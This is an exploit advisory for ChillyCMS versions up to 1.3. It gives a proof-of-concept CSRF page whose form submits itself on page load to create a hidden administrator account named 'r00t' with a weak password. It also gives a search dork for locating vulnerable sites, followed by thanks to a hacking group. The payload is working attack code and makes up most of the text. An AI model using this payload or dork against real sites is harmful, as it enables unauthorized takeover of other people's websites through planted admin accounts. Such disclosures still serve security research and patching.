# Exploit Title: ChillyCMS <= 1.3 CSRF create admin
# Date: 21/08/2012
# Exploit Author: Kallimero
# Vendor Homepage: http://chillycms.bplaced.net/chillyCMS/index.php
# Software Link: http://chillycms.bplaced.net/chillyCMS/media/files/chillyCMS_full.zip
# Version: 1.3
# Dork : intext:"powered by chillyCMS"
# Tested on: Debian
We can easily create a administrator in ChillyCMS through a CSRF vulnerability.
There is the PoC :
<body onload="document.forms[0].submit()">
<form method="post" action="http://localhost/chillyCMS/admin/usersgroups.site.php">
<input name="user" value="r00t" type="hidden">
<input name="name" value="r00t" type="hidden">
<input name="pw" value="123456" type="hidden">
<input name="pw2"value="123456" type="hidden">
<input name="email" value="" type="hidden">
<input type="hidden" value="1" name ="gids[]">
<input type="hidden" value="3" name ="gids[]">
<input type="hidden" value="4" name ="gids[]">
<input type="hidden" value="1" name="active">
<input type="hidden" name="language" value="en">
<input class="middle" name="getnewsletter" value="true" value="1" type="hidden">
<input name="myaction" value="new" type="hidden">
<input name="action" value="updateuser" type="hidden">
<input name="id" value="0" type="hidden">
</form>
</body>
Thanks :
All hwc members : Necromoine, fr0g, AppleSt0rm, St0rn, Zhyar, k3nz0.
Please visit : http://orgasm.re/
Groucho